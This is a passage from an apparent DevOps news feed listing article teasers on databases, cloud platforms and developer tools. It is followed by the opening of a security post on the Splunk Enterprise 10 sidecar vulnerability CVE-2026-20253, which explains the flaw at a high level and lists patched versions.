        <a href="#h3-what-is-an-sbom-and-why-cant-you-ship-without-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is an SBOM (and Why Can’t You Ship Without One)?
        </a>
        </h3><p>Learn what a software bill of materials (SBOM) is, why it matters for supply chain security, how to generate one, and what formats and standards to use.</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-is-an-sbom/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        </h2><h3 id="h3-pgtt-v45-has-been-released" class="group relative scroll-mt-24">
        <a href="#h3-pgtt-v45-has-been-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgtt v4.5 has been released
        </a>
        </h3><p>Bangkok, Thailand - June 21, 2026 PostgreSQL Global Temporary Tables pgtt is a PostgreSQL extension to create, manage and use DB2 or Oracle-style Global Temporary Tables. Once created the use is just </p>
<p><strong>📅 Jun 28, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgtt-v45-has-been-released-3330/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_qualstats-214-is-out" class="group relative scroll-mt-24">
        <a href="#h3-pg_qualstats-214-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_qualstats 2.1.4 is out!
        </a>
        </h3><p>Taipei, Taiwan - Sat 20 Jun pg_qualstats 2.1.4 The PoWA team is pleased to announce the release of the version 2.1.4 of pg_qualstats, a PostgreSQL extension keeping statistics on predicates found in W</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_qualstats-214-is-out-3327/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_stat_kcache-232-is-out" class="group relative scroll-mt-24">
        <a href="#h3-pg_stat_kcache-232-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_stat_kcache 2.3.2 is out!
        </a>
        </h3><p>Taipei, Taiwan - Sat 20 Jun pg_stat_kcache 2.3.2 The PoWA team is pleased to announce the release of the version 2.3.2 of pg_stat_kcache, an extension that gathers statistics about real reads and writ</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_stat_kcache-232-is-out-3328/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgedge-announces-coldfront-for-postgresql-seamlessly-uniting-ai-analytical-and-oltp-workloads" class="group relative scroll-mt-24">
        <a href="#h3-pgedge-announces-coldfront-for-postgresql-seamlessly-uniting-ai-analytical-and-oltp-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgEdge Announces ColdFront for PostgreSQL, Seamlessly Uniting AI, Analytical and OLTP Workloads
        </a>
        </h3><p>Offers read and write access to hot and cold storage with no application code changes, delivering up to 90% savings in storage ALEXANDRIA, Va., June 18, 2026 — pgEdge, the leading open source enterpri</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgedge-announces-coldfront-for-postgresql-seamlessly-uniting-ai-analytical-and-oltp-workloads-3325/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-10-years-of-mongodb-atlas-built-for-whats-next" class="group relative scroll-mt-24">
        <a href="#h3-10-years-of-mongodb-atlas-built-for-whats-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 10 Years of MongoDB Atlas: Built for What’s Next
        </a>
        </h3><p>Nearly a decade ago, I joined MongoDB as a Senior Product Manager to help build the company’s new cloud product, MongoDB Atlas. Our customers had been telling us they wanted to bring MongoDB’s familia</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/news/10-years-mongodb-atlas-built-for-whats-next"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-using-salting-to-lower-latency-for-large-blobs-in-scylladb" class="group relative scroll-mt-24">
        <a href="#h3-using-salting-to-lower-latency-for-large-blobs-in-scylladb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Using Salting to Lower Latency for Large Blobs in ScyllaDB
        </a>
        </h3><p>A modified salting technique that cuts P99 write latency 22x for large blobs</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/25/using-salting-to-lower-latency-for-large-blobs-in-scylladb/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-hunting-a-16-year-old-sqlite-bug-with-tla-is-dqlite-affected" class="group relative scroll-mt-24">
        <a href="#h3-hunting-a-16-year-old-sqlite-bug-with-tla-is-dqlite-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Hunting a 16-year-old SQLite bug with TLA+: is dqlite affected?
        </a>
        </h3><p>This article was written by Marco Manino and Alberto Carretero, dqlite team at Canonical. 1. Anatomy of a SQLite bug Recently SQLite published a new version with a fix to a long-standing bug in the wa</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/hunting-a-16-year-old-sqlite-bug-with-tla-is-dqlite-affected"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-riding-the-raft-to-strong-consistency-in-scylladb" class="group relative scroll-mt-24">
        <a href="#h3-riding-the-raft-to-strong-consistency-in-scylladb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Riding the Raft to Strong Consistency in ScyllaDB
        </a>
        </h3><p>How ScyllaDB is using per-tablet Raft groups to bring strong consistency to data, without sacrificing the parallelism that makes it fast</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/24/raft-strong-consistency/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-knowledge-graph-retrieval-augmented-generation-rag-structured-retrieval-for-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-knowledge-graph-retrieval-augmented-generation-rag-structured-retrieval-for-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Knowledge graph retrieval-augmented generation (RAG): structured retrieval for AI agents
        </a>
        </h3><p>A user asks your support agent: &quot;is the slow-sync bug from my last ticket fixed in the version you told me to upgrade to?&quot; Answering means connecting three documents: the customer&#39;s earlier ticket, th</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/knowledge-graph-rag-structured-retrieval-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-fintech-ai-platform-why-agents-need-one-database-not-five" class="group relative scroll-mt-24">
        <a href="#h3-the-fintech-ai-platform-why-agents-need-one-database-not-five" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Fintech AI Platform: Why Agents Need One Database, Not Five
        </a>
        </h3><p>A few months ago I watched a fintech engineering team walk me through their AI agent platform. They had a transactional database for balances and ledgers, a separate vector database for semantic retri</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/database-for-fintech-ai-agent-platform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-trust-in-agentic-ai-from-poc-to-production" class="group relative scroll-mt-24">
        <a href="#h3-build-trust-in-agentic-ai-from-poc-to-production" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build Trust in Agentic AI: From POC to Production
        </a>
        </h3><p>The enterprise adoption of artificial intelligence has reached an inflection point. Organizations are rapidly moving into the era of agentic AI, autonomous systems capable of executing complex reasoni</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/innovation/build-trust-in-agentic-ai-from-poc-to-production"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-engineering-vs-prompt-engineering-the-real-difference" class="group relative scroll-mt-24">
        <a href="#h3-context-engineering-vs-prompt-engineering-the-real-difference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context engineering vs prompt engineering: the real difference
        </a>
        </h3><p>A customer asks your support agent whether their refund went through. The agent checks, says yes, and cites a confirmation number. The refund actually bounced back twenty minutes ago, but the lookup t</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-engineering-vs-prompt-engineering/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South Africa and hosted by Volum</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-call-for-contributors-opentelemetry-for-dart-and-flutter" class="group relative scroll-mt-24">
        <a href="#h3-call-for-contributors-opentelemetry-for-dart-and-flutter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Call for Contributors: OpenTelemetry for Dart and Flutter
        </a>
        </h3><p>Why OpenTelemetry for Dart and Flutter? Dart is a full-stack language and the language of Flutter, one of the most popular frameworks for building cross-platform applications. Data shows over 20% of c</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/dart-flutter-opentelemetry/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bring-it-to-our-shop-workdays-pitch-for-keeping-ai-agents-close-to-your-most-valuable-data" class="group relative scroll-mt-24">
        <a href="#h3-bring-it-to-our-shop-workdays-pitch-for-keeping-ai-agents-close-to-your-most-valuable-data" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 “Bring it to our shop”: Workday’s pitch for keeping AI agents close to your most valuable data
        </a>
        </h3><p>Workday, the payroll and HR data platform, has been pursuing AI and agents for a while, but while other businesses</p>
<p><strong>📅 Jun 28, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/workday-ai-inference-guardrails/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-okta-is-the-first-to-bring-ai-agent-governance-inside-fedramp-boundaries" class="group relative scroll-mt-24">
        <a href="#h3-okta-is-the-first-to-bring-ai-agent-governance-inside-fedramp-boundaries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Okta is the first to bring AI agent governance inside FedRAMP boundaries
        </a>
        </h3><p>Okta has made its AI agent governance platform generally available for FedRAMP- and HIPAA-regulated environments, becoming what it claims is the first independent</p>
<p><strong>📅 Jun 28, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/okta-ai-agents-fedramp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-agentic-ai-with-perimeter-guardrails-whats-new-in-vpc-service-controls" class="group relative scroll-mt-24">
        <a href="#h3-securing-agentic-ai-with-perimeter-guardrails-whats-new-in-vpc-service-controls" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing agentic AI with perimeter guardrails: What's new in VPC Service Controls
        </a>
        </h3><p>As enterprises scale autonomous AI agents into production, enabling safe innovation requires robust architectural guardrails. AI agents connect across tools and datasets, so it’s essential to establis</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/identity-security/securing-agentic-ai-whats-new-in-vpc-service-controls/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-sovereign-open-and-carrier-grade-what-suse-telco-cloud-36-actually-delivers" class="group relative scroll-mt-24">
        <a href="#h3-sovereign-open-and-carrier-grade-what-suse-telco-cloud-36-actually-delivers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Sovereign, Open, and Carrier-Grade: What SUSE Telco Cloud 3.6 Actually Delivers
        </a>
        </h3><p>Table of Contents Introduction What “Technology Preview” Actually Means MetalLB BGP Mode in SUSE Telco Cloud 3.6: Load Balancing That Talks to Your Network PTP (Precision Time Protocol) for 5G: The Pr</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/sovereign-open-and-carrier-grade-what-suse-telco-cloud-3-6-actually-delivers/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ec2-r8g-instances-now-available-in-additional-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ec2-r8g-instances-now-available-in-additional-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EC2 R8g instances now available in additional regions
        </a>
        </h3><p>Starting today, Amazon Elastic Compute Cloud (Amazon EC2) R8g instances are available in AWS Asia Pacific (Thailand, New Zealand), AWS Africa (Cape Town), AWS Europe (Milan), and AWS Canada West (Calg</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ec2-r8g-instances-additional-regions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-every-agents-connection-to-railway" class="group relative scroll-mt-24">
        <a href="#h3-every-agents-connection-to-railway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Every (Agents) Connection to Railway
        </a>
        </h3><p>We&#39;ve created a few workflow patterns on how to get your agent talking to Railway peacefully. The balance of Local and Remote MCPs, Railway&#39;s Agent Skills, the CLI + Railway Agent give your local harn</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/agent-connection-to-railway"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-ai-is-transforming-devops-and-cloud-engineering" class="group relative scroll-mt-24">
        <a href="#h3-how-ai-is-transforming-devops-and-cloud-engineering" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How AI Is Transforming DevOps and Cloud Engineering
        </a>
        </h3><p>While AI is often associated with chatbots or generative models, one of its most significant impacts is happening behind the scenes — within DevOps and cloud engineering.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/how-ai-is-transforming-devops-and-cloud-engineering/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        </h2><h3 id="h3-visual-studio-code-1127-insiders" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1127-insiders" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.127 (Insiders)
        </a>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.127 (Insiders)</p>
<p><strong>📅 Jul 1, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_127"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kotlin-notebook-sunset" class="group relative scroll-mt-24">
        <a href="#h3-kotlin-notebook-sunset" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kotlin Notebook Sunset
        </a>
        </h3><p>Starting from IntelliJ IDEA 2026.2, JetBrains will sunset Kotlin Notebook as a product and will no longer maintain it. The plugin will remain available on an open-source model so the community can con</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/idea/2026/06/kotlin-notebook-sunset/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-greptile-cursor-and-devin-agree-that-agents-should-run-their-code-what-they-run-it-against-matters" class="group relative scroll-mt-24">
        <a href="#h3-greptile-cursor-and-devin-agree-that-agents-should-run-their-code-what-they-run-it-against-matters" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Greptile, Cursor, and Devin agree that agents should run their code. What they run it against matters.
        </a>
        </h3><p>The industry has recognized that shipping agent code at scale requires runtime verification, and it is moving that way fast.</p>
<p><strong>📅 Jun 27, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/runtime-verification-coding-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-vibe-slop-is-the-symptom-context-debt-is-the-disease" class="group relative scroll-mt-24">
        <a href="#h3-vibe-slop-is-the-symptom-context-debt-is-the-disease" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Vibe slop is the symptom. Context debt is the disease.
        </a>
        </h3><p>Some of the engineers who made vibe coding possible have decided it’s a problem. Last month, The Wall Street Journal’s</p>
<p><strong>📅 Jun 27, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/vibe-coding-context-debt/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-is-accelerating-how-fast-we-build-the-wrong-thing" class="group relative scroll-mt-24">
        <a href="#h3-ai-is-accelerating-how-fast-we-build-the-wrong-thing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Is Accelerating How Fast We Build the Wrong Thing
        </a>
        </h3><p>AI coding assistants have made it trivially easy to ship software faster — and that is precisely the problem. Human developers used to absorb the gaps in a vague spec by asking questions, reading betw</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-is-accelerating-how-fast-we-build-the-wrong-thing/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-open-sourcing-the-lsp-client-api-in-intellij-idea-20262" class="group relative scroll-mt-24">
        <a href="#h3-open-sourcing-the-lsp-client-api-in-intellij-idea-20262" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Open-Sourcing the LSP Client API in IntelliJ IDEA 2026.2
        </a>
        </h3><p>Language Server Protocol (LSP) solves a real problem: before, each IDE or editor had to implement support for a specific language separately. A language server puts that work in one place and exposes </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/platform/2026/06/open-sourcing-the-lsp-client-api-in-intellij-idea-2026-2/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-challenges-designers-face-in-open-source-and-how-to-fix-them" class="group relative scroll-mt-24">
        <a href="#h3-challenges-designers-face-in-open-source-and-how-to-fix-them" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Challenges designers face in open source (and how to fix them)
        </a>
        </h3><p>Open source powers up to 90% of modern software, yet many projects lack usability. Canonical’s Design team surveyed 115 cross-functional professionals to uncover the 4 core challenges UI/UX designers </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/challenges-designers-face-in-open-source-and-how-to-fix-them"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-iterating-faster-with-typescript-7" class="group relative scroll-mt-24">
        <a href="#h3-iterating-faster-with-typescript-7" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Iterating faster with TypeScript 7
        </a>
        </h3><p>How the VS Code and TypeScript teams collaborated to adopt TypeScript 7 and speed up VS Code development.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/blogs/2026/06/26/iterating-faster-with-ts-7"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-dev-containers-story-introducing-eelapi-for-plugin-authors" class="group relative scroll-mt-24">
        <a href="#h3-the-dev-containers-story-introducing-eelapi-for-plugin-authors" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Dev Containers Story: Introducing EelApi for Plugin Authors
        </a>
        </h3><p>Modern development has shifted one old IDE paradigm significantly: Now, not only is it possible that a project is not hosted on the same physical or remote machine as your IDE instance, it could even </p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/platform/2026/06/the-dev-containers-story-introducing-eelapi-for-plugin-authors/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-real-winner-of-cursors-60b-acquisition-wont-be-ai-coding-assistants" class="group relative scroll-mt-24">
        <a href="#h3-the-real-winner-of-cursors-60b-acquisition-wont-be-ai-coding-assistants" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Real Winner of Cursor’s $60B Acquisition Won’t Be AI Coding Assistants
        </a>
        </h3><p>When news broke that SpaceX would acquire Cursor’s parent company, Anysphere, in a reported $60 billion all-stock deal, most of the discussion centered around AI. This was another milestone and enormo</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/cursor-s-60b-acquisition/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-automated-network-configuration-assurance-matters-for-enterprise-netops" class="group relative scroll-mt-24">
        <a href="#h3-why-automated-network-configuration-assurance-matters-for-enterprise-netops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why automated network configuration assurance matters for enterprise NetOps
        </a>
        </h3><p>Every network operations (NetOps) professional knows the anxiety of a manual configuration update. Even when you meticulously plan the change, a single unrecorded variable or an ad hoc configuration t</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/why-automated-network-configuration-assurance-matters-enterprise-netops"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-visual-studio-code-1126" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1126" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.126
        </a>
        </h3><p>Learn what is new in Visual Studio Code 1.126.</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_126"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Splunk Shipped an Unauthenticated Database Sidecar: CVE-2026-20253]]></title>
      <link>https://devops-daily.com/posts/splunk-postgres-sidecar-rce-cve-2026-20253</link>
      <description><![CDATA[You did not install a PostgreSQL server, but Splunk Enterprise 10 did, and in affected versions its sidecar endpoint had no authentication. The result is a pre-auth, CVSS 9.8 path to writing files on the host as the Splunk user, now on CISA's actively-exploited list. The bug is patched; the broader lesson is about every helper service your tools quietly bundle.]]></description>
      <pubDate>Sat, 27 Jun 2026 16:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/splunk-postgres-sidecar-rce-cve-2026-20253</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[security]]></category><category><![CDATA[splunk]]></category><category><![CDATA[cve]]></category><category><![CDATA[observability]]></category><category><![CDATA[sidecar]]></category>
      <content:encoded><![CDATA[<p>The thing about your security and observability tools is that they run with a lot of access. They read your logs, reach into your hosts, and sit on a trusted part of the network. So when one of them quietly ships a service you did not know about, and that service answers the network with no authentication, the blast radius is exactly as bad as it sounds.</p>
<p>That is CVE-2026-20253, a critical flaw in Splunk Enterprise. Splunk 10 bundles a PostgreSQL sidecar to back some of its newer features, and in affected versions the endpoint that talks to that sidecar did not check who was calling it. Anyone who could reach it over the network could invoke file operations without credentials, which is a pre-auth foothold on a box that, being a SIEM, sees everything. It is rated <strong>CVSS 9.8</strong>, it is patched, and CISA added it to the Known Exploited Vulnerabilities catalog on June 18, 2026, upgrading it from proof-of-concept to active exploitation the next day.</p>
<p>Here is what the bug is, what to do about it today, and the more useful point hiding underneath it.</p>
<h2 id="h2-what-the-bug-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug is
        </a>
        </h2><p>The vulnerable component is the PostgreSQL sidecar service that ships with Splunk Enterprise 10. Splunk runs it as a companion process to support functionality added in the 10 line. The problem is classic and is captured exactly by its weakness class, <a href="https://cwe.mitre.org/data/definitions/306.html">CWE-306: Missing Authentication for Critical Function</a>: the sidecar&#39;s endpoint exposed file operations and never verified the caller.</p>
<p>In practice that means an unauthenticated, network-reachable attacker can <strong>create or truncate arbitrary files</strong> on the host, running as the Splunk user. Arbitrary file write as a service account is not the end state an attacker wants, it is the stepping stone: write to a location the platform later executes, clobber a config, or drop a script, and file-write becomes remote code execution. That escalation is why the industry reporting calls this an unauthenticated RCE and why it is being exploited in the wild rather than sitting as a theoretical write primitive.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>This is on CISA&#39;s actively-exploited list (KEV), added June 18, 2026 and marked active a day later.</strong> If you run a self-managed Splunk Enterprise 10 deployment, treat this as patch-now, not patch-this-sprint.</p>
</div></div></div><h2 id="h2-who-is-affected" class="group relative scroll-mt-24">
        <a href="#h2-who-is-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who is affected
        </a>
        </h2><p>Per the advisory, the affected and fixed versions are:</p>
<ul>
<li><strong>Splunk Enterprise 10.2</strong>, below <strong>10.2.4</strong> (fixed in 10.2.4)</li>
<li><strong>Splunk Enterprise 10.0</strong>, below <strong>10.0.7</strong> (fixed in 10.0.7)</li>
